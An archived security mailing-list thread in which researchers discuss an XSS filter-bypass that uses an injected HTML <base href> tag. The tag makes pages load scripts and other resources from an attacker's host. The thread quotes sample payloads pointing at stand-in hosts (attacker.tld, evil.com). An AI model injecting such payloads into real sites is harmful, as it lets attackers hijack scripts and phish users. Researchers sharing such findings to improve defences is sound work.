Hi Arshan+list,
Indeed - the same vulnerability. I did google for it, but I didn't
pick up your site (and RSnake's cheat sheet doesn't list it - now I
know why).
Anyway - sorry. You deserve full credit for it, of course.
Thanks for the correction and the further information,
-Amit
On 7/16/08, Arshan Dabirsiaghi
<arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
http://i8jesus.com/?p=10 (Jan 2008)
I also presented this vector last year at OWASP San Jose when I
demo'ed
AntiSamy as an example of dangerous content that isn't malicious
code on its
own. That's one of the selling points of AntiSamy – it stops not
only XSS
(well, we hope) but also prevents phishing attacks that abuse HTML/
CSS.
I talked about it with RSnake afterwards and he had some crazy
reason for
not putting it on his cheatsheet – claimed it was too much like
the <base
href="javascript:foo();//"> vector. As noted on my blog post, IE7
is longer
(according to policy) supposed to be honoring <base> tags outside
of <HEAD>,
but FF is still vulnerable. You could use this to hijack anything –
stylesheets (more XSS/phishing), images, scripts, etc. The only
thing <base>
won't help you steal as far as resources is anything gathered in
JavaScript.
I think some of the big players had this figured out already (or more
likely, just got really lucky). MySpace takes <base href> values,
base64
encodes them, and redirects them through another domain. The flow
is like
this for them:
1. User puts in <base href="http://evil.com";>
2. Str = base64("http://evil.com";)
3. Profile = <base
href="http://msplinks.com/redir?<base64encodedStr>
Maybe there's a way to abuse that, but I don't think so. And eBay
doesn't
have any relative links after user content, at least when I first
looked at
this last year. They probably both just got lucky. =]
Arshan
---------- Previous message ----------
From: Amit Klein <aksecurity@xxxxxxxxx>
Date: Tue, Jul 15, 2008 at 7:33 AM
Subject: [WEB SECURITY] Nice little XSS trick
To: Web Security <websecurity@xxxxxxxxxxxxx>
Hi list
Recently I've been thinking about bypassing anti-XSS filters, and
a nice
little trick occurred to me, which I haven't seen anywhere (e.g.
it's not on
RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
mention
BASe, but not the trick I describe here). The idea is to use the
HTML BASE
tag to force loading of JS code from the attacker's host. Consider
a page
with XSS vulnerability such as:
<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>
Now, an attacker can inject <base
href="http://www.attacker.tld/";>, and next thing you know,
the browser (IE, at least) loads the JS from
http://www.attacker.tld/foo/bar.js... And the beauty is
that there's no "explicit" JS code involved in the payload itself.
Note that according to the HTML standard, BASE should be placed in
the HEAD
section
(http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
This is indeed observed by FF 2, but not by IE (checked IE6).
Thanks,
-Amit
----------------------------------------------------------------------
------
Join us on IRC: irc.freenode.net #webappsec
Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/
Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA